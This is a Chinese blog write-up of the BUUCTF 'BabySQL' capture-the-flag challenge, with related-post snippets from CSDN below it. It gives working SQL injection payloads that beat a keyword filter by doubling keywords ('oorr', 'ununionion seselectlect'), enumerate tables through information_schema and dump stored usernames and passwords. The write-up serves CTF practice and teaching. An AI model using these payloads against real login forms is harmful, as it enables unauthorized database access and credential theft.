buu web:[极客大挑战 2019]BabySQL(sql注入双写绕过)

已于 2022-04-18 12:49:16 修改
阅读量3k 收藏 4
点赞数 1
分类专栏: buuctf
于 2022-04-18 12:47:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55378150/article/details/124244548
版权

SQL注入 绕过过滤 联合查询 数据库枚举 安全防护
关键词由CSDN通过智能技术生成

打开靶场,熟悉的界面

依旧是先上万能密码

1' or 1=1#  1' or 1=1#

好家伙,直接就给你报错了,可以看到,or被它过滤掉了,所以我们尝试一下双写绕过

1' oorr 1=1#  1' oorr 1=1#

成功登录!

可以拿admin回去登录界面继续注入了 ,先爆字段

admin' oorrder by 2#(密码随便输)

提示在字段数附近有报错,猜测可能是by也被过滤了,依旧是双写绕过 

admin' oorrder bbyy 2# 

 可以的,通过二分法测试出字段数是3,然后联合查询爆回显位,但是很明显,这道题的过滤是有点多的,所以我们可以先做一下fuzzing排查一下,方便后面的查询

 

 只能说用到的基本上都被过滤了,所以咱们得一个个的进行绕过,先联合查询爆回显位

-1' ununionion seselectlect 1,2,3#

查数据库

-1' ununionion seselectlect 1,2,database()# 

查数据库里的表

-1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#  

查一下第一张表里的内容 

-1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#

继续爆里面的内容

​​​​​​​-1' ununionion seselectlect 1,2,group_concat(id,username,password) frfromom geek.b4bsql# 

这里还是被小坑一手(password里还有个or),修改一下

​​​​​​​-1' ununionion seselectlect 1,2,group_concat(id,username,passwoorrd) frfromom geek.b4bsql#

搞定! 

m0_55378150
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[极客挑战 2019]BabySQL
kuller_Yan的博客
06-07 444
[极客挑战 2019]BabySQL wp from Kuller_Yan 打开靶机,熟悉的极客挑战界面 先尝试万能密码1' or 1=1 # 显示ERROER 但是仔细观察报错语句,似乎没有看到or 猜测后端使用replace()函数过滤,尝试双写or:1' oorr 1=1 # 正常回显,看来我们猜测的不错。 然后测试字段数:1' order by 3 #;ERROR ,尴尬,忘记了order里面也有or,而且by也被过滤了,所以双写:1' oorrder bbyy 3 #,回显正常,试下4:1'
极客挑战2019——baby sql
qq_44308327的博客
11-22 673
baby sql(注意双写绕过) 判断注入类型 既然是sql注入题,那就先判断注入的数据类型 payload: ?username=admin&password=1 payload: ?username=admin&password=2-1 //判断页面是否发生变化,如有变化则为字符型注入,反之则为整型注入 无变化,所以为整型注入 判断回显位 payload:?username=admin&password=1' order by 3%23 ...
joinUs-buu2018:h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信qq分享
05-02
joinUs-buu2018 h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信/qq分享 #预览地址
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
它被广泛应用于游戏开发、3D渲染、科学计算以及任何需要高性能计算的Web应用程序。在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向...
BUUCTF:[极客挑战 2019]BabySQL
末初的CSDN博客
11-04 698
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]BabySQL 简单测试之后发现有些字符被过滤,初步判断这里的过滤是指特殊字符被替换为空,如下图所示 使用Burp进行SQL过滤字符的Fuzz 这些长度为726响应内容是Input your username and password的Fuzz结果是被过滤的字符 Trick 替换为空的关键字过滤使用双写关键字绕过 这里空格.
BUU SQL COURSE
09-19
BUU SQL COURSE是一个SQL注入的实战演练平台。在这个平台上,你可以学习SQL注入的知识点,了解SQL注入的前置知识和一般测试步骤,并使用这些知识来解题。在注入过程中,一般需要找到注入点,闭合语句,带入语句进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值